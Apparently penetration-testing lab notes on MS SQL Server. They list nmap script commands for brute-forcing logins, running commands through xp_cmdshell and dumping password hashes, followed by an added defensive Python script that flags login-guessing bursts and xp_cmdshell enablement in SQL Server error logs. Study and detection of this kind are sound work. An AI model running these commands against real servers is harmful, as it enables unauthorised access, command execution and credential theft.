ms sql syntax

References (link titles as kept in the original notes):

  • pentestlab: testing MSSQL with nmap
  • Tally (HTB) by ippsec: MS SQL reverse shell + command execution

nmap -p1433 --script ms-sql-info 10.11.1.31

#discover basic info about the DB (product version, instance name)

nmap -p1433 --script ms-sql-brute 10.11.1.31

#brute force / check for weak MS SQL account passwords using nmap's built-in username and password lists

nmap -p1433 --script ms-sql-brute --script-args "userdb=/usr/share/wordlists/rockyou.txt,passdb=/usr/share/wordlists/passlist.txt" 10.11.1.31

#brute force with custom wordlists. Keep the argument list quoted and comma-separated with no spaces: a space after the comma ends --script-args early and nmap treats "passdb=..." as a target hostname

nmap -p1433 --script ms-sql-empty-password 10.11.1.31

#check for accounts with null / empty passwords

nmap -p1433 --script ms-sql-hasdbaccess.nse --script-args mssql.username=sam 10.11.1.31

#check which databases the user sam is allowed to access. The authenticated ms-sql-* scripts take credentials via mssql.username and mssql.password; if sam's password is not empty, add mssql.password=<password> to --script-args (with it omitted the scripts try an empty password)

nmap -p1433 --script ms-sql-tables --script-args mssql.username=sam 10.11.1.31

#list tables in the accessible databases; the columns are listed as well

nmap -p1433 -sV 10.11.1.31

#plain service / version detection on the MS SQL port

In SQL Server 2000, xp_cmdshell was enabled by default, so command execution is possible as well (from SQL Server 2005 on it ships disabled and has to be switched on through sp_configure).

nmap -p1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sam 10.11.1.31

#check whether command execution via xp_cmdshell is available (the script runs its default command, ipconfig /all, when no command is given)

nmap -p1433 --script ms-sql-xp-cmdshell --script-args "ms-sql-xp-cmdshell.cmd=whoami,mssql.username=sam" 10.11.1.31

#run an arbitrary command on the server. Quote the argument list and put no spaces around the comma, otherwise nmap takes the text after the space as a target

nmap -p1433 --script ms-sql-dump-hashes --script-args mssql.username=sam 10.11.1.31

#dump the MS SQL login password hashes (needs a privileged DB account) for offline cracking with john / hashcat
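Added example (not part of the original notes, and not code from nmap or the author): the defender's side of the two activities above, password guessing against MS SQL logins and xp_cmdshell being switched on, as both show up in the SQL Server ERRORLOG. The parser follows the stock ERRORLOG layout (timestamp, source column, message; failed logins carry a `[CLIENT: ip]` tail and configuration changes are logged as `Configuration option 'xp_cmdshell' changed from 0 to 1`). The log lines themselves are constructed for the example; the client IP 10.11.1.5, the user names and the timestamps are made up, and the burst threshold of 4 failures within 60 seconds is an assumption to tune per environment.

```python
"""Flag MSSQL login-guessing bursts and xp_cmdshell enablement in a SQL Server ERRORLOG."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample ERRORLOG excerpt (not from the page). Five failures from one client
# in under a second, a success from the same client right after, then xp_cmdshell is enabled.
SAMPLE_ERRORLOG = """\
2023-05-10 14:02:11.45 Logon       Error: 18456, Severity: 14, State: 8.
2023-05-10 14:02:11.45 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.11.1.5]
2023-05-10 14:02:11.61 Logon       Error: 18456, Severity: 14, State: 8.
2023-05-10 14:02:11.61 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.11.1.5]
2023-05-10 14:02:11.78 Logon       Error: 18456, Severity: 14, State: 5.
2023-05-10 14:02:11.78 Logon       Login failed for user 'admin'. Reason: Could not find a login matching the name provided. [CLIENT: 10.11.1.5]
2023-05-10 14:02:11.93 Logon       Error: 18456, Severity: 14, State: 8.
2023-05-10 14:02:11.93 Logon       Login failed for user 'sam'. Reason: Password did not match that for the login provided. [CLIENT: 10.11.1.5]
2023-05-10 14:02:12.10 Logon       Error: 18456, Severity: 14, State: 8.
2023-05-10 14:02:12.10 Logon       Login failed for user 'sam'. Reason: Password did not match that for the login provided. [CLIENT: 10.11.1.5]
2023-05-10 14:02:12.30 Logon       Login succeeded for user 'sam'. Connection made using SQL Server authentication. [CLIENT: 10.11.1.5]
2023-05-10 14:05:40.02 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2023-05-10 14:05:40.05 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2023-05-10 15:30:00.00 Logon       Login failed for user 'reports'. Reason: Password did not match that for the login provided. [CLIENT: 10.11.1.40]
"""

# ERRORLOG layout: "YYYY-MM-DD HH:MM:SS.ff <source> <message>" (fractional seconds dropped)
LINE_RE = re.compile(r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)\.\d+\s+(\S+)\s+(.*)$")
FAIL_RE = re.compile(r"Login failed for user '([^']*)'.*\[CLIENT: ([\d.]+)\]")
SUCCESS_RE = re.compile(r"Login succeeded for user '([^']*)'.*\[CLIENT: ([\d.]+)\]")
XPCMD_RE = re.compile(r"Configuration option 'xp_cmdshell' changed from (\d) to (\d)")


def parse_errorlog(text):
    """Turn ERRORLOG lines into event dicts; lines of no interest (e.g. the bare 18456 lines) are skipped."""
    events = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
        msg = m.group(3)
        if (f := FAIL_RE.search(msg)):
            events.append({"ts": ts, "kind": "fail", "user": f.group(1), "client": f.group(2)})
        elif (s := SUCCESS_RE.search(msg)):
            events.append({"ts": ts, "kind": "success", "user": s.group(1), "client": s.group(2)})
        elif (x := XPCMD_RE.search(msg)):
            events.append({"ts": ts, "kind": "xp_cmdshell", "old": int(x.group(1)), "new": int(x.group(2))})
    return events


def detect_bruteforce(events, threshold=4, window=timedelta(seconds=60)):
    """Flag each client IP with >= threshold failed logins inside some window-long span.

    Returns {client: {"failures": n, "users": [...], "success_after": user or None}}, where
    success_after is the first login that succeeded from that client once the burst started.
    """
    fails = defaultdict(list)
    for e in events:
        if e["kind"] == "fail":
            fails[e["client"]].append(e)
    hits = {}
    for client, fl in fails.items():
        fl.sort(key=lambda e: e["ts"])
        best, j = None, 0  # densest (count, start, end) window found by two-pointer sweep
        for i in range(len(fl)):
            while fl[i]["ts"] - fl[j]["ts"] > window:
                j += 1
            if best is None or i - j + 1 > best[0]:
                best = (i - j + 1, j, i)
        if best is None or best[0] < threshold:
            continue
        burst = fl[best[1]:best[2] + 1]
        burst_start = burst[0]["ts"]
        success_after = next(
            (e["user"] for e in sorted(events, key=lambda e: e["ts"])
             if e["kind"] == "success" and e["client"] == client and e["ts"] >= burst_start),
            None,
        )
        hits[client] = {
            "failures": len(burst),
            "users": sorted({e["user"] for e in burst}),
            "success_after": success_after,
        }
    return hits


def detect_xp_cmdshell_enabled(events):
    """Return the timestamps at which xp_cmdshell was switched on (changed ... to 1)."""
    return [e["ts"].strftime("%Y-%m-%d %H:%M:%S")
            for e in events if e["kind"] == "xp_cmdshell" and e["new"] == 1]


def analyse(text=SAMPLE_ERRORLOG):
    """Run both detections over an ERRORLOG text and return the findings."""
    events = parse_errorlog(text)
    return {"bruteforce": detect_bruteforce(events),
            "xp_cmdshell_enabled": detect_xp_cmdshell_enabled(events)}


if __name__ == "__main__":
    import json
    print(json.dumps(analyse(), indent=2))
```

Run it against a real ERRORLOG with `analyse(open(path).read())`. Failed logins are only written to the ERRORLOG when login auditing covers failures (the default setting), so confirm that before relying on this; the densest-window sweep keeps the detector linear in the number of failures per client.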
Last updated 3 years ago